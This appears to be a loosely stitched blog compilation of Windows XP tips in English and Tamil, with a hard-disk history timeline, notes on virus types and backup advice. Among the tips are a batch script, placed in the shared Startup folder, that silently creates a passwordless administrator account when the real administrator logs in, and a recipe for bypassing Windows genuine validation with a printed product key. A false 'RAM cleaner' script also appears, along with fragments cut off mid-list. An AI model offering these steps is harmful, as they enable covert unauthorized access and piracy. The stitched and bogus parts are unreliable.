LOCK YOUR COMPUTER



To create a shortcut on your desktop to lock your computer:

>Right-click the desktop.
>Point to New, and then click Shortcut.
>The Create Shortcut Wizard opens. In the text box, type the following:
rundll32.exe user32.dll,LockWorkStation

>Click Next.
Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like.
Click Finish.

You can also change the shortcut's icon
To change the icon:
>Right click the shortcut and then select Properties.
>Click the Shortcut tab, and then click the Change Icon button.
In the Look for icons in this file text box, type:
Shell32.dll.
Click OK.
Select one of the icons from the list and then click OK

ibm_harddiskநம் கம்ப்யூட்டரில் உள்ள ஹார்ட் டிஸ்க்கில் தான் அனைத்து டேட்டாக்களும் பதிவு செய்யப்படுகின்றன. இங்குதான் கம்ப்யூட்டரின் ஆப்பரேட்டிங் சிஸ்டம் அமர்ந்து கொண்டு கம்ப்யூட்டரை இயக்குகிறது. ஏறத்தாழ 50 ஆண்டுகளா கத்தான் ஹார்ட் டிஸ்க் கம்ப்யூட்டரின் ஓர் இன்றியமையாத உறுப்பாக இயங்கி வருகிறது. கம்ப்யூட்டர் பயன்பாடு வந்த தொடக்கத்தில் ஹார்ட் டிஸ்க் என்பதே இல்லை. இப்போது 2 டெராபைட் கொள்ளளவு கொண்ட ஹார்ட் டிஸ்க்குகள் வந்துள்ளன. ஆனால் பத்து ஆண்டுகளுக்கு முன்பு வரை 1 ஜிபிக்கும் குறைவான அளவுள்ள ஹார்ட் டிஸ்க்குகளே புழக்கத்தில் இருந்தன.

1956

ஐ.பி.எம். நிறுவனம் தன்னுடைய RAMAC 305 என்ற சிஸ்டத்தில் மிகப் பெரிய அளவிலான கொள்ளளவுடன் கூடிய ஹார்ட் டிஸ்க்கினை இணைத்து அறிமுகப்படுத்தியது. இந்த மிகப் பெரிய கொள்ளளவு எவ்வளவு தெரியுமா? 5 எம்.பி. அப்போது அது உண்மையிலேயே மிகப் பெரிய அளவிலான திறன் தான். ஒரு எம்பி டேட்டா கொள்ளளவிற்கு 10 ஆயிரம் டாலர் விலை எனக் குறிக்கப்பட்டது. இதன் திட அளவு இரண்டு ரெப்ரிஜிரேட்டர் அளவிற்கு இருந்தது. இதில் 24 அங்குல அளவுள்ள 50 பிளாட்டர்கள் இருந்தன.

1961

ஐ.பி.எம். ஹார்ட் டிஸ்க்கிற்கான டிரைவ் ஹெட் காற்றில் இருக்கும் வகையில் அமைத்தது.

1961

பைரண்ட் கம்ப்யூட்டர் 90 எம்பி திறனுடன் ஹார்ட் டிஸ்க்கைக் கொண்டு வந்தது. 39 அங்குல அகலத்தில் 24 டிஸ்க்குகள் கொண்டதாக இது அமைந்திருந்தது.


1963

முதல் முதலாக கம்ப்யூட்டர் சிஸ்டத்திலிருந்து வெளியே எடுக்கக் கூடிய ரிமூவபிள் ஹார்ட் டிஸ்க்கினை ஐ.பி.எம். உருவாக்கியது. இதன் திறன் 2.69 எம்.பி.; 14 அங்குல அளவில் 6 பிளாட்டர்கள் இருந்தன.

1966

புதுவிதமான ரெகார்டிங் ஹெட் கொண்ட ஹார்ட் டிஸ்க்க்னை ஐ.பி.எம். உருவாக்கியது. திறன் 29.17 எம்.பி.

1971

ட்ரேக் சர்வோ சிஸ்டம் கொண்ட முதல் ஹார்ட் டிஸ்க்கினை ஐ.பி.எம். கொண்டு வந்தது. இது 100 எம்பி திறன் கொண்டிருந்தது.

1973

நவீன வின்ச்செஸ்டர் ஹார்ட் டிரைவினை ஐ.பி.எம். கொண்டு வந்தது. 14 அங்குல பிளாட்டர்கள் 11 இருந்தன. திறன் 100 எம்பி.

1975


ஐ.பி.எம். 62 – ரோட்டரி ஆக்சுவேட்டருடன் வந்த முதல் ஹார்ட் டிஸ்க். 5 அல்லது 9 எம்பி திறனுடன் அமைந்தது.

1976

43 எப்.டி. கிறிஸ்டல் என்னும், முதல் வளைந்து கொடுக்கக் கூடிய டிஸ்க் டிரைவ்; இரு பக்கமும் எழுதக் கூடியது. 8 அங்குல அகலத்துடன் 0.568 எம்பி கொள்ளளவு கொண்டது.

ஷுகார்ட் அசோசியேட்ஸ் என்னும் நிறுவனம் முதல் 5.25 அங்குல அகலத்தில் ப்ளெக்ஸிபிள் டிஸ்க்கினைக் கொண்டு வந்தது. இதில் 0.2188 எம்பி டேட்டா பதியலாம்.

1979

பியுஜிட்ஸு நிறுவனம் 10.5 அங்குல அகலத்தில் ஹார்ட் டிஸ்க் டிரைவினைத் தந்தது. ஆறு பிளாட்டர்கள் உள்ளன.

ஸீகேட் டெக்னாலஜிஸ் நிறுவனம் எஸ்.டி. 506 என்ற 5.25 அங்குல ஹார்ட் டிஸ்க்கினை 5 எம்.பி திறனுடன் கொண்டு வந்தது. இதில் 4 பிளாட்டர்கள் இருந்தன.

1980

முதல் கிகாபைட் அளவிலான ஹார்ட் டிஸ்க். ஐ.பி.எம். கொண்டு வந்த இந்த ஹார்ட் டிஸ்க் ஒரு ரெப்ரிஜிரேட்டர் அளவு இருந்தது. 250 கிலோ எடையுடன் 40 ஆயிரம் டாலர் மதிப்பு கொண்டிருந்தது.


1981

சோனி நிறுவனமும் டிஸ்க் தயாரிப்பு பணியில் இறங்கியது. 3.5 அங்குல ப்ளெக்ஸிபில் டிஸ்க்கினைக் கொண்டு வந்தது.கொள்ளளவு திறன் 0.4375 எம்பி.

1983

ரோடிம் முதல் 3.5 அங்குல ஹார்ட் டிஸ்க்கினைத் தயாரித்து வழங்கியது.இதில் இரண்டு பிளாட்டர்கள் இருந்தன. அளவு 10 எம்பி.

1986

அதிக திறனுடன் இயங்கும் ஸ்கஸ்ஸி ஹார்ட் டிஸ்க் டிரைவுடன் ஆப்பிள் நிறுவனத்தின் மேக் கம்ப்யூட்டர் வெளியானது.

1988

கானர் நிறுவனம் ஒரு அங்குல உயரத்திலான 3.5 அங்குல ஹார்ட் டிரைவினைத் தயாரித்து வழங்கியது. இன்று வரை இதுதான் லேப்டாப் கம்ப்யூட்டர்களில் பயன்படுத்தப்படுகிறது. முதலில் இது 31 எம்பி திறன் கொண்டதாக அமைந்தது.

1992


ஸீ கேட் நிறுவனம் அதிர்வுகளைத் தாங்கக் கூடிய முதல் 2.5 அங்குல டிஸ்க் டிரைவினைத் தயாரித்து வழங்கியது.

1993

முதல் 7200 ஆர்.பி.எம். வேக ஹார்ட் டிஸ்க் டிரைவினை (Barracuda ST12550) ஸீ கேட் தயாரித்து வழங்கியது. இதில் 3.5 அங்குல அளவிலான பிளாட்டர்கள் பத்து அமைந்திருந்தன.

1996

மிக அதிக அளவிலான ஸ்டோரேஜ் டென்சிட்டி கொண்ட மீடியத்தினை ஐ.பி.எம். தந்தது. ஒரு சதுர அங்குல இடத்தில் நூறு கோடி பிட் டேட்டாவினை இதில் அமைக்க முடியும்.

1997

ஸீகேட் முதல் 10,000 ஆர்.பி.எம். வேக ஹார்ட் டிஸ்க் டிரைவினை வழங்கியது. முதலில் 3.5 அங்குல பிளாட்டர்களுடனும் பின் 3 அங்குல பிளாட்டர்களுடனும் அமைந் திருந்தது.

1999

மைக்ரோ டிரைவ் என அழைக்கப்படும் மிகச் சிறிய ஹார்ட் டிஸ்க்கினை ஐ.பி.எம். வழங்கியது. இதில் ஒரு அங்குல பிளாட்டர்கள் இருந்தன. ஒரு பிளாட்டரில் 340 எம்.பி. டேட்டா பதிய முடிந்தது.


2000

அதிவேக இயக்கத்துடன், 15000 ஆர்.பி.எம்., ஹார்ட் டிஸ்க் டிரைவினை ஸீ கேட் தயாரித்து வழங்கியது.

2002

பெர்பென்டிகுலர் மேக்னடிக் ரெகார்டிங் டெக்னாலஜி அடிப்படையில் ஹார்ட் டிஸ்க் இயங்க முடியும் என ஸீ கேட் காட்டியது. இதன் மூலம் ஒரு சதுர அங்குல சிப்பில் 100 கிகா பிட்ஸ் தகவல்களைப் பதிய முடியும்.

2005

ஹிடாச்சி முதல் 500 ஜிபி ஹார்ட் டிஸ்க்கினை வெளியிட்டது.

2006

நோட்புக் கம்ப்யூட்டர்களில் பயன்படக் கூடிய Momentus 5400.3 என்னும் 2.5 அங்குல முதல் ஹார்ட் டிரைவினை ஸீ கேட் தந்தது. இதன் கொள்ளளவு திறன் 160 ஜிபி.

Barracuda 7200.10  7200.10 என்ற பெயரில் 750 ஜிபி திறன் கொண்ட ஹார்ட் டிரைவினை ஸீ கேட் வெளியிட்டது.


2007

முதல் 1 டெரா பைட் ஹார்ட் டிஸ்க்கினை ஹிடாச்சி நிறுவனம் டெஸ்க் ஸ்டார் 7கே 1000 என்ற பெயரில் வெளியிட்டது. இதில் 3.5 அங்குல அளவிலான பிளாட்டர்கள் ஐந்து இருந்தன. ஒவ்வொரு பிளாட்டரும் பி.எம்.ஆர். தொழில் நுட்பத்தினைப் பயன்படுத்தி 200 ஜிபி டேட்டாவினைப் பதிந்தன.

2008

லேப் டாப் கம்ப்யூட்டரில் பயன்படுத்த ஹிடாச்சி, 2. 5 அங்குல அளவிலான ஹார்ட் டிரைவினைத் தந்தது. இதில் இரண்டு பிளாட்டர்கள் 5,400 ஆர்.பி.எம்.வேகத்தில் சுழன்றன.

2009

வெஸ்டர்ன் டிஜிட்டல் முதல் 2 டெரா பைட் ஹார்ட் டிஸ்க்கினைக் கொண்டு வந்தது. நான்கு 3.5 அங்குல பிளாட்டர்கள் இதில் உள்ளன. ஒரு பிளாட்டரில் 500 ஜிபி டேட்டா பதியமுடியும்.

வெஸ்டர்ன் டிஜிட்டல் மேலும் ஒரு சாதனையை மேற்கொண்டது. முதல் 1 டெரா பைட் ஹார்ட் டிஸ்க்கினை 2.5 அங்குல அகலத்தில் தயாரித்தது. லேப்டாப்பில் கம்ப்யூட்டர்களில் பயன்படுத்தக்கூடிய இதன் பெயர் ஸ்கார்ப்பியோ புளு.

சோசியல் நெட்வொர்க் இணையதளங்களில், ஆரம்பித்த சில நாட்களிலேயே அசுர வளர்ச்சி பெற்றுள்ள பேஸ்புக்கிற்கு போட்டியாக, கூகுள் நிறுவனம் 'கூகுள் மீ' என்ற பெயரில் புதி‌ய இணையதளத்தை துவக்க உள்ளதாக செய்தி வெளியாகி உள்ளது.

இதுகுறித்து பத்திரிகையாளர்களைச் சந்தி்த்த டிக் நிறுவனர் கெவின் ரோஸ், இந்த செய்தியை நம்ப முடியவில்லை எனினும், நம்பத்தகுந்த இடத்திலிருந்து இந்த தகவல் வந்துள்ளதாக அவர் தெரிவித்தார்.

தொழில்நுட்ப இணையதளங்களான மாஷபிள் மற்றும் டெக்கிரஞ்ச் உள்ளிட்ட தளங்களும் இந்த தகவலை உறுதி செய்துள்ளன.

ACCESS YOUR DESKTOP ICONS FROM YOUR TASKBAR

Do you ever want to access your desktop, or shortcut icons on your desktop when your screen is cluttered with windows which you don't want to minimize?

A simple solution. Place a shortcut to your desktop atop your START Menu. Here's how:

1) Right click on your TASKBAR and choose PROPERTIES.
2) Select the START MENU PROGRAMS tab, then the  ADVANCED button.
3) In the right panel, under the PROGRAMS  folder, you will see any shortcuts you have already placed atop your START menu. Right click here in the white space here and choose NEW, then SHORTCUT.

4. In the command line for your shortcut, type c:\windows\desktop (If your Windows directory has another name, substitute that name for windows).

5. Click NEXT. Then in the name box, name your shortcut Desktop.

6. Click the FINISH button.

7. Close the Explorer window, then click ok in TASKBAR  PROPERTIES.

8. Now, open START on your taskbar. VOILA! Your desktop folder icon should be visible. Click it to open your desktop folder.
Success!
You will now be able to view and access your desktop shortcut icons (not non-shortcut icons). If you want ALL desktop icons to be visible (Recycle Bin, My Computer etc.), you will need to place shortcuts to these other icons on your desktop.
Hint:
If you normally hide your taskbar, so that it is not always on top of other windows, you can access it at any time from any program  by pressing and holding control, then pressing escape (the ESC key at top left of your keyboard). You may then quickly choose your desktop folder and access desktop icons as well as any other programs accessible via your taskbar and programs menu.
OPEN EXPLORER RATHER THAN  MY COMPUTER TO VIEW FILES
(This is a great tip!! One of the most useful customizations...)

Have you created drive icons for your hard drives and floppy drives on your desktop

If so, you may wish that they opened in the two-paned Explorer view, rather than in My Computer.
To change the default view to Explorer:

1) Open Explorer (from Start, Programs, Explorer, or if you have created it, from the Explorer icon on your desktop).

2) Choose the View, Options menu.

3) Select the File Types tab.

4). Under registered file types, double click on FOLDER.

5) From the list of actions, select explore.

6) Click on the SET DEFAULT button at bottom right!

Now when you double click on a folder or open a drive icon shortcut Explorer will open instead of  My Computer.

Keeping the Windows XP Core in the RAM
If you have 512 MB or more of RAM, you can increase system performance by having the Windows XP 'Core' kept in the RAM instead of paged on the hard disk.

Go to Start -> Run - Type regedit and press enter - On the left hand side tree, navigate to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\

- On the list on the right side, look for an entry called 'DisablePagingExecutive'
- Double click it
- Press 1 on your keyboard
- Click OK
- Exit regedit and reboot the computer

நமது கணிணியில் நாமோ அல்லது நம் வீட்டு குட்டீசோ விளையாட Game சாப்ட்வேர் இன்ஸ்டால் செய்திருப்போம் இதனை கணிணி software Registery ல் அப்டேட் செய்து விடும் நாம் இந்த game விளையாட தொடங்கும் போது புதிய சில Instructions மூலம் இயங்க வைக்கும் சிலநாட்களில் அதனை Delete செய்து அடுத்த Game விளையாடுவோம் .

நாம் அதனை remove செய்தாலும் அந்த instructions நமது கணினியிலேயே தங்கிவிடும்.

ஒவ்வொரு முறை கணிணியை இயக்கும்போதும் கணிணி இந்த instructions ஐ செயல்படுத்த முயற்சிக்கும் நாம் அந்த Software ஐ ஏற்கனவே delete செய்துவிட்டோம் எனவே அதனை கண்டுபிடிக்க முடியாது இதற்க்கு registry error என்று பெயர் . இவ்வாறு பல software நாம் பயன்படுத்தி நீக்கியிருந்தால் நமது கணிணி மேற்கூறிய செயல்களால் மெதுவாக செயல்பட தொடங்கும் .இதனை கண்டறிந்து நீக்கினாலே மீண்டும் அந்த வேகத்தை பெற்றுவிடமுடியும் . இதனை எவ்வாறு கண்டறிவது, இதனை கண்டறிந்து நீக்க எனப்படும் software உள்ளது. இதனை நிறுவி அவற்றை முழுமையாக நீக்கலாம்.

விண்டோஸ் 7 இயங்குதளம் (Operating System) கடந்த அக்டோபர் 22 2009 அன்று வெளியிடப்பட்டது. விண்டோஸ் 7 வெளியிடப்பட்ட 6 மாதங்களில் உலகத்தில் 10 ல் ஒரு கணினியில் பயன்படுத்தும் இயங்குதளமாக மாறியுள்ளதாக மைக்ரோசாப்ட் நிறுவனம் தெரிவித்திருக்கிறது.

இயங்குதள வரலாற்றில், விண்டோஸ் 7 தான் அதிக அளவில் விற்பனை செய்யப்பட்ட மற்றும் செய்யபட போகும் இயங்குதளமாக இருக்கும் என மைக்ரோசாப்ட் நிறுவனம் கருதுகிறது.

மைக்ரோசாப்ட் கடந்த ஏப்ரல் மாதம் வெளியிட்ட அறிக்கையில், $14.5 bn மார்ச் 31 வரையுள்ள காலாண்டிற்கான வருவாயாக தெரிவித்திருக்கிறது. மேலும் அந்நிறுவன தலைமை கணக்கு அலுவலர் (CFO) Peter Klein “continues to be a growth engine” என்றும் கூறியுள்ளார்.

கணினிகளைத் தாக்க நாள்தோறும் பல்லாயிறக்கணக்கான வைரஸ்கள் உருவாக்கப்படுகின்றன. அவற்றை பண்புவாரியாக பிரித்துப் போட்டுப் பார்த்தால், மொத்தமாக 6 வகைகள் தேறும். அவை என்ன என்ன? எப்படிப் பட்டவை?

1. Boot Sector Viruses:

அதாவது, பூட் செக்டார் வைரஸ் என்பது, நமது கணினியின் BIOS என சொல்லிப்படும் "அடிப்படை உள்ளீட்டு அல்லது வெளியீட்டு முறை" எனும் சிஸ்டம் மீது தான் தாக்குகின்றன. பொதுவாக வைரஸ் வந்ததை உண்ர்ந்தால் உடனே இயங்குதள நிறுவி குறுந்தகட்டை தேடி எடுத்து, மறு நிறுவல் செய்து விடுவோம். அப்படி எல்லாம் செய்தால் இந்த பூட் செக்டார் வைரஸை அசைத்துக் கூடப் பார்க்க முடியாது. நீங்கள் புதியதாக ஒரு HDD வாங்கி வந்து வைத்தாலும் சரி, அதுவும் பாதிக்கப்படும். காரணம் இது தாக்குவது பாதிப்பது எல்லாம் MBR (MBR என்றால் Master Boot Record ஆகும். இது இயங்குதளத்தை கண்டுபிடித்து இயங்க வகை செய்யும்) எனும் தகவலைச் சேமித்துவைத்திருக்கும் BIOS-இன் பகுதியைத் தான். அதனால் BIOS ரெகவரி டிஸ்க் ஒன்று உருவாக்கி BIOS-ஐ மீள்-நிறுவல் செய்து, HDD-இனையும் அழித்து, இயங்குதளம் மீள்-நிறுவல் செய்து தான் கணினியைக் காப்பாற்ற முடியும்.

2. கூடாத நிரல் அல்லது கோப்புகள்:

இந்த வகை வைரஸ்கள், நிரல்களாகவோ அல்லது கோப்பாகவோ ஹார்ட் டிஸ்கில் இயங்குதளத்தின் பார்ட்டீசனில் உட்கார்ந்துக் கொள்ளும். இவை, இயங்குதளம் தொடங்கும் போதே, தானும் தொடங்கி தன் கூடாத செய்கையினால் கணினியை பாதிப்புக்குள்ளாக்கும். அந்த நிரல்/கோப்பு எதுவென்று தெரிந்தாலே, Task Manager கொண்டு நிறுத்திவிடலாம். பின்னர், அழித்தும் விடலாம்.

3. Stealthy Virus:

இவையும் இரண்டாவதாக சொல்லப்பட்ட வைரஸ் போலத் தான். ஆனால், இந்த வகை வைரஸ்கள் தனது அடையாளத்தைக் காட்டிக் கொள்வதே இல்லை. இதனால், இதனைக் கண்டுபிடித்து முடக்க/அழிக்க மிகவும் கடினமானதும் கூட. Anti-Virus இருக்கிறதே என தப்புக் கணக்குப் போடாதீர். வேட்டியாடும் Anti-Virus-களிடம் தான் இதன் விளையாட்டே. நீங்கள் வைரஸ் ஸ்கேன் செய்யத் தொடங்கியவுடன் தனது கோப்பிற்கு, ஒரு நல்ல நிரல் என்ற பிம்பத்தை உருவாக்கிவிட்டுத் தானே தற்காலிகமாக முடங்கிக்கொள்ளும். இதனால், Anti-virus-களிடம் இது அகப்படாது தப்பித்துவிடும்.

4. MultiPartite:

இந்த வகை வைரஸ்கள் மேலே சொல்லப்பட்ட மூன்று வகையிலும் சார்ந்தவை. இதனால், இது பாதிக்காத இடமே கணினியில் இருக்காது. இவ்வாறான வைரஸ்கள் பெரும்பாலும் தாக்குவது குறைவாக இருந்தாலும், தாக்கப்பட்டால் பெரும்பாதிப்பு உண்டாகும்.

5. Polymorphic:

Make your windows Xp GENUINE.!!

This will allow you to bypass the Microsoft Genuine Validation thingythis method works better than many others i've tried before.
forget the cracks and injectors etc... this is the BEST WAY:
1) start > run > "regedit" (without the quotes of course)
2) go to the key:HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer...and doubleclick on it.
Then change some of the value data to ANYTHING ELSE...delete some, add some letters, I don't care...just change it!now close out regedit.
3) go to start > run > "%systemroot%\system32\oobe\msoobe.exe /a" (again, dont type the quotes)
4) the activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ.
Now you can dl all the updates without activating,
and the Genuine Microsoft Validation thingy won't bug you no more!!
Works with most WinXP versions though ther r some exceptions..

2 In The registry editor, drill down to the following key:

3 Right click LegalNoticeCaption,

Disable CD Burning
Exciting isn't it?

The user can't burn any CDs by this trick. This restriction will disable the use of the inbuilt CD recording functions of Windows.

Open your registry and follow this path: HKEY_CURRENT_USER>Software>Microsoft>Windows>Current Version>Policies>Explorer and
create this key: "NoCDBurning" and set its value to 1. Close you registry and logout/restart your system for the change to take the effect.
Recover the lost administrators password in Windows XP

Slightly more work needed if you lose or forget the Windows XP administrator password.

1.First reboot Windows XP in safe mode by re-starting the computer and pressing F8 repeated as the computer starts up.

2.Then (in safe mode) click Start and then click Run. In the open box type "control userpasswords2" without the quotes - I have just used quotes to differentiate what you have to type.

3.You will now have access to all the user accounts, including the administrators account and will be able to reset the lost password.

4.Just click the administrators user account, and then click Reset Password.

5.You will need to add a new password in the New password and the Confirm new password boxes, and confirm by clicking OK.


All done, you have recovered the lost adminitrators password!
Remove Thumb.db file

Thumb.db is is a cache of the current picture in that directory.to remove it go for following

step1 > open "WINDOWS EXPLORER".

2>go to "TOOLS".

3>open "FOLDER OPTIONS".

4>go to "VIEW".

5>see 1st section "FILES & FOLDERS".

6>click on the "DO NOT CACHE THUMBNAILS".

now the thumbnail file will be removed from ur computer once u do this the file will be never created.
Error Reporting in XP

If error reporting in XP is bugging you then turn it off.

When a system error occurs in XP, a little dialog box appears asking if you want to report the error to Microsoft. Click the message box to make it disappear. You don't have to report the error if you don't want to and on today's "Call for Help" Leo shows you how to turn off the feature if you find it distracting.

To disable error reporting, follow these directions:

1. Right-click My Computer and choose Properties.
2. Click the Advanced tab on your System Properties dialog box.
3. Click the Error Reporting button on the Advanced tab.
4. Place a checkmark next to "Disable error reporting."
5. Leave the other radio button unchecked next to the text labeled, "But notify me when critical errors occur."
6. Click OK.

Clean your RAM by notepad

           U may recognize that ur system gets slower and slower when playing and working a lot with ur pc. That's cause ur RAM is full of remaining progress pieces u do not need any more.

So create a new text file on ur desktop and call it .. uhm.. "RAMcleaner" or something...

Type

FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option when u save it ]

Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater "cleaning-progress".

To create an administrator account is easy. You just need to use your guest account and create one administrator account instantly. Just follow the steps :
Open Notepad, paste the following :

@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin

And save it to a bat file.

Now place this bat file in location local:\Documents and Settings\All Users\Start Menu\Programs\Startup

And when your admin logs into the system, the new account will be automatically created without the notice of the user. Next time when you login, you will get the user account for you.

Startup Screen

   1. Create a 320x400 bitmap in the root directory and name it LOGO.SYS
   2. You can use LOGOW.SYS file in the Windows directory as a starter

Logoff Screens

   1. There are many system file that constitutes Lofoff screen.
   2. They are actually bitmaps 320x400 that just have a different extension
   3. The hidden file in the root directory LOGO.SYS is the startup logo.
   4. There are two files in the Windows directory.
   5. LOGOW.SYS is the Wait while Shutting down ... screen.
   6. LOGOS.SYS is the You may now shut-off or Reboot screen.
   7. Make two new image files of your chice in Paint and name it as LOGOW.SYS and LOGOS.SYS and replce the actual windows file by this two.
   8. But make sure they should be of the same size

Backup a Whole Computer

Step1
The first step is to figure out where you will be backing up the computer to. You need an external hard drive with enough space to store a full backup. To determine how much space you need on a Windows PC, go to My Computer, right-click the drive, and click on "Properties". From there, click on the "General" tab, and look at the size of the drive. If there are multiple drives on the computer, figure out the total size of all the hard drives. Buy an external (USB) hard drive that's at least twice the size of your computer's hard drives.

Step2
Once you have the hard drive, you must acquire backup software. There are several options available, like Norton Ghost and Macrium Reflect. Each piece of software is similar, but Macrium Reflect has a free edition, which will be used for this article. A download link is in the "Resources" section, located near the bottom of the page. Follow the instructions on screen to install the software.

Step3
Plug in the USB drive, following the manufacturer's instructions, and then load the backup software. Once you have the software loaded, you must create a new backup. In Macrium Reflect Free Edition, click on the "Create a backup image of an entire disk or selected partition(s)" button. Read the instructions on screen and select the disks to backup. You will need to select the backup location as well; make sure you select the USB hard drive!

Step4
Run the backup. The backup will take a long time, depending on the size of the hard drive. Once the whole backup has been completed, exit the backup program.
Clean Your Computer's Desktop

Having a desktop on your computer with a million icons in random places not only looks bad, but makes it very hard to find things. Here are some steps to declutter your computer's desktop.

Step1
Delete unused shortcut icons. Think of all the shortcuts that you created when installing various programs. Do you really use those applications enough to warrant a shortcut? Probably not. Shortcuts should be reserved for the programs you use the most -- most likely your preferred browser and favorite games!

Step2
Create new folders and label them with categories such as "Office Documents" and "Family Photos" and then move those files into their respective folders. This helps declutter your desktop, and also organizes all your files in the process.

Step3
Use a higher resolution. Bigger screen resolutions gives you more screen real estate, and allows you to work with your files in an easier and more convenient manner. When you use smaller screen resolutions, you can only show so many files on your desktop at once.

Step4
Move any personal photos and documents into your Documents folder. There is generally no reason why you should have personal files on your desktop, especially if you are sharing this computer with someone else. Keep them organized in appropriate folders off the desktop, and leave your screen real estate for the most important applications only.

Step5
When you've forgotten what your wallpaper looks like because of all your icons and you are too lazy to do the steps above, simply right click on the desktop and choose the View option. Then, disable the "Show Desktop Icons" feature, and all your icons will disappear until you turn this option back on!
